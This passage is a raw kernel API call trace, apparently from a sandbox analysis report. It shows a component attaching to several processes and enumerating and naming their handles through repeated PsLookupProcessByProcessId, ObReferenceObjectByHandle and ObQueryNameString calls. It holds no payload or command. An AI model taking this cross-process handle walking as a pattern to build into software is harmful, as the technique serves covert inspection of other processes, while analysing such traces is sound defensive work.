PsAcquireProcessExitSynchronization () returned 0x0 [0259.008] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.008] ObReferenceObjectByHandle (in: Handle=0xffffffff8000146c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.008] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.008] PsReleaseProcessExitSynchronization () returned 0x2 [0259.008] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f90b [0259.008] IoCompleteRequest () returned 0x0 [0259.008] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.008] PsAcquireProcessExitSynchronization () returned 0x0 [0259.008] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.008] ObReferenceObjectByHandle (in: Handle=0xffffffff80001474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.008] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.008] PsReleaseProcessExitSynchronization () returned 0x2 [0259.008] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f90a [0259.008] IoCompleteRequest () returned 0x0 [0259.008] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.008] PsAcquireProcessExitSynchronization () returned 0x0 [0259.008] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.008] ObReferenceObjectByHandle (in: Handle=0xffffffff80001478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.008] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.008] PsReleaseProcessExitSynchronization () returned 0x2 [0259.008] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f909 [0259.008] IoCompleteRequest () returned 0x0 [0259.009] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.009] PsAcquireProcessExitSynchronization () returned 0x0 [0259.009] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.009] ObReferenceObjectByHandle (in: Handle=0xffffffff80001480, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.009] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.009] PsReleaseProcessExitSynchronization () returned 0x2 [0259.009] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f908 [0259.009] IoCompleteRequest () returned 0x0 [0259.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0259.009] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.009] PsAcquireProcessExitSynchronization () returned 0x0 [0259.009] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0259.374] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000692a4de0, HandleInformation=0x0) returned 0x0 [0259.374] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.374] PsReleaseProcessExitSynchronization () returned 0x2 [0259.374] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffda [0259.374] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0259.374] ObfDereferenceObject (Object=0xffffe000692a4de0) returned 0x7fff [0259.374] IoCompleteRequest () returned 0x0 [0259.374] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.374] PsAcquireProcessExitSynchronization () returned 0x0 [0259.374] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0260.937] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00147f3fca0, HandleInformation=0x0) returned 0x0 [0260.937] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0260.937] PsReleaseProcessExitSynchronization () returned 0x2 [0260.937] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd9 [0260.937] ObQueryNameString (in: Object=0xffffc00147f3fca0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0260.937] ObfDereferenceObject (Object=0xffffc00147f3fca0) returned 0x7fff [0260.937] IoCompleteRequest () returned 0x0 [0260.937] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0260.937] PsAcquireProcessExitSynchronization () returned 0x0 [0260.937] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0261.933] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000692b0930, HandleInformation=0x0) returned 0x0 [0261.933] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0261.933] PsReleaseProcessExitSynchronization () returned 0x2 [0261.933] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd8 [0261.933] ObQueryNameString (in: Object=0xffffe000692b0930, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0261.933] ObfDereferenceObject (Object=0xffffe000692b0930) returned 0x8000 [0261.933] IoCompleteRequest () returned 0x0 [0261.933] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0261.933] PsAcquireProcessExitSynchronization () returned 0x0 [0261.933] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0263.878] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069ae6101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330f20, HandleInformation=0x0) returned 0x0 [0263.878] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0263.878] PsReleaseProcessExitSynchronization () returned 0x2 [0263.878] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd7 [0263.878] ObQueryNameString (in: Object=0xffffe00069330f20, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0263.879] ObfDereferenceObject (Object=0xffffe00069330f20) returned 0x8000 [0263.879] IoCompleteRequest () returned 0x0 [0263.879] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0263.879] PsAcquireProcessExitSynchronization () returned 0x0 [0263.879] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0263.987] ObReferenceObjectByHandle (in: Handle=0x8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a8eb101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330d60, HandleInformation=0x0) returned 0x0 [0263.987] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0263.987] PsReleaseProcessExitSynchronization () returned 0x2 [0263.987] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd6 [0263.987] ObQueryNameString (in: Object=0xffffe00069330d60, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0263.987] ObfDereferenceObject (Object=0xffffe00069330d60) returned 0x8000 [0263.987] IoCompleteRequest () returned 0x0 [0263.987] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0263.987] PsAcquireProcessExitSynchronization () returned 0x0 [0263.987] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0264.622] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe000685d0901, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330ba0, HandleInformation=0x0) returned 0x0 [0264.622] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.622] PsReleaseProcessExitSynchronization () returned 0x2 [0264.622] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd5 [0264.622] ObQueryNameString (in: Object=0xffffe00069330ba0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.622] ObfDereferenceObject (Object=0xffffe00069330ba0) returned 0x8000 [0264.622] IoCompleteRequest () returned 0x0 [0264.622] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.622] PsAcquireProcessExitSynchronization () returned 0x0 [0264.622] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0264.645] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693309e0, HandleInformation=0x0) returned 0x0 [0264.645] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.645] PsReleaseProcessExitSynchronization () returned 0x2 [0264.645] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd4 [0264.645] ObQueryNameString (in: Object=0xffffe000693309e0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.645] ObfDereferenceObject (Object=0xffffe000693309e0) returned 0x8000 [0264.645] IoCompleteRequest () returned 0x0 [0264.645] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.645] PsAcquireProcessExitSynchronization () returned 0x0 [0264.645] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0264.665] ObReferenceObjectByHandle (in: Handle=0x98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330820, HandleInformation=0x0) returned 0x0 [0264.665] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.665] PsReleaseProcessExitSynchronization () returned 0x2 [0264.665] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd3 [0264.665] ObQueryNameString (in: Object=0xffffe00069330820, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.665] ObfDereferenceObject (Object=0xffffe00069330820) returned 0x8000 [0264.665] IoCompleteRequest () returned 0x0 [0264.665] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.665] PsAcquireProcessExitSynchronization () returned 0x0 [0264.665] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0264.715] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069330660, HandleInformation=0x0) returned 0x0 [0264.715] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.715] PsReleaseProcessExitSynchronization () returned 0x2 [0264.715] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd2 [0264.715] ObQueryNameString (in: Object=0xffffe00069330660, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.715] ObfDereferenceObject (Object=0xffffe00069330660) returned 0x8000 [0264.715] IoCompleteRequest () returned 0x0 [0264.715] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.716] PsAcquireProcessExitSynchronization () returned 0x0 [0264.716] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0264.719] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069331090, HandleInformation=0x0) returned 0x0 [0264.719] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.719] PsReleaseProcessExitSynchronization () returned 0x2 [0264.719] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd1 [0264.719] ObQueryNameString (in: Object=0xffffe00069331090, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.719] ObfDereferenceObject (Object=0xffffe00069331090) returned 0x8000 [0264.719] IoCompleteRequest () returned 0x0 [0264.719] PsLookupProcessByProcessId (in: ProcessId=0x108, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.719] PsAcquireProcessExitSynchronization () returned 0x0 [0264.719] KeStackAttachProcess (in: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006816e840, ApcState=0xffffd000b1b8e400) [0264.732] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069331c40, HandleInformation=0x0) returned 0x0 [0264.732] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.732] PsReleaseProcessExitSynchronization () returned 0x2 [0264.732] ObfDereferenceObject (Object=0xffffe0006816e840) returned 0xffd0 [0264.732] ObQueryNameString (in: Object=0xffffe00069331c40, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.732] ObfDereferenceObject (Object=0xffffe00069331c40) returned 0x8000 [0264.732] IoCompleteRequest () returned 0x0 [0264.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x154) returned 0x0 [0264.733] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.733] PsAcquireProcessExitSynchronization () returned 0x0 [0264.733] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.733] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693f54c0, HandleInformation=0x0) returned 0x0 [0264.733] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.733] PsReleaseProcessExitSynchronization () returned 0x2 [0264.733] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28069 [0264.733] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.733] ObfDereferenceObject (Object=0xffffe000693f54c0) returned 0x7fff [0264.733] IoCompleteRequest () returned 0x0 [0264.733] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.733] PsAcquireProcessExitSynchronization () returned 0x0 [0264.733] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.733] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001478eadb0, HandleInformation=0x0) returned 0x0 [0264.733] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.733] PsReleaseProcessExitSynchronization () returned 0x2 [0264.733] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28068 [0264.733] ObQueryNameString (in: Object=0xffffc001478eadb0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.733] ObfDereferenceObject (Object=0xffffc001478eadb0) returned 0x8000 [0264.733] IoCompleteRequest () returned 0x0 [0264.733] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.733] PsAcquireProcessExitSynchronization () returned 0x0 [0264.733] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.733] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006957cf20, HandleInformation=0x0) returned 0x0 [0264.733] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.733] PsReleaseProcessExitSynchronization () returned 0x2 [0264.733] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28067 [0264.733] ObQueryNameString (in: Object=0xffffe0006957cf20, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.733] ObfDereferenceObject (Object=0xffffe0006957cf20) returned 0x8000 [0264.733] IoCompleteRequest () returned 0x0 [0264.733] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.733] PsAcquireProcessExitSynchronization () returned 0x0 [0264.733] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.733] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069538700, HandleInformation=0x0) returned 0x0 [0264.733] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.733] PsReleaseProcessExitSynchronization () returned 0x2 [0264.733] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28066 [0264.733] ObQueryNameString (in: Object=0xffffe00069538700, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.733] ObfDereferenceObject (Object=0xffffe00069538700) returned 0x800f [0264.733] IoCompleteRequest () returned 0x0 [0264.734] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.734] PsAcquireProcessExitSynchronization () returned 0x0 [0264.734] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.734] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069580550, HandleInformation=0x0) returned 0x0 [0264.734] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.734] PsReleaseProcessExitSynchronization () returned 0x2 [0264.734] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28065 [0264.734] ObQueryNameString (in: Object=0xffffe00069580550, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.734] ObfDereferenceObject (Object=0xffffe00069580550) returned 0x800f [0264.734] IoCompleteRequest () returned 0x0 [0264.734] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.734] PsAcquireProcessExitSynchronization () returned 0x0 [0264.734] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.734] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001480d2330, HandleInformation=0x0) returned 0x0 [0264.734] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.734] PsReleaseProcessExitSynchronization () returned 0x2 [0264.734] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28064 [0264.734] ObQueryNameString (in: Object=0xffffc001480d2330, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.734] ObfDereferenceObject (Object=0xffffc001480d2330) returned 0x7fc2 [0264.734] IoCompleteRequest () returned 0x0 [0264.734] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.734] PsAcquireProcessExitSynchronization () returned 0x0 [0264.734] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.734] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067ed8090, HandleInformation=0x0) returned 0x0 [0264.734] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.734] PsReleaseProcessExitSynchronization () returned 0x2 [0264.734] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28063 [0264.734] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.734] ObfDereferenceObject (Object=0xffffe00067ed8090) returned 0x7ffd [0264.734] IoCompleteRequest () returned 0x0 [0264.734] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.734] PsAcquireProcessExitSynchronization () returned 0x0 [0264.734] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.734] ObReferenceObjectByHandle (in: Handle=0x190, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001480bab40, HandleInformation=0x0) returned 0x0 [0264.734] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.734] PsReleaseProcessExitSynchronization () returned 0x2 [0264.734] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28062 [0264.734] ObQueryNameString (in: Object=0xffffc001480bab40, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.734] ObfDereferenceObject (Object=0xffffc001480bab40) returned 0x8000 [0264.734] IoCompleteRequest () returned 0x0 [0264.734] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.734] PsAcquireProcessExitSynchronization () returned 0x0 [0264.734] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.735] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001480a8ca0, HandleInformation=0x0) returned 0x0 [0264.735] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.735] PsReleaseProcessExitSynchronization () returned 0x2 [0264.735] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28061 [0264.735] ObQueryNameString (in: Object=0xffffc001480a8ca0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.735] ObfDereferenceObject (Object=0xffffc001480a8ca0) returned 0x8000 [0264.735] IoCompleteRequest () returned 0x0 [0264.735] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.735] PsAcquireProcessExitSynchronization () returned 0x0 [0264.735] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.735] ObReferenceObjectByHandle (in: Handle=0x1b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, 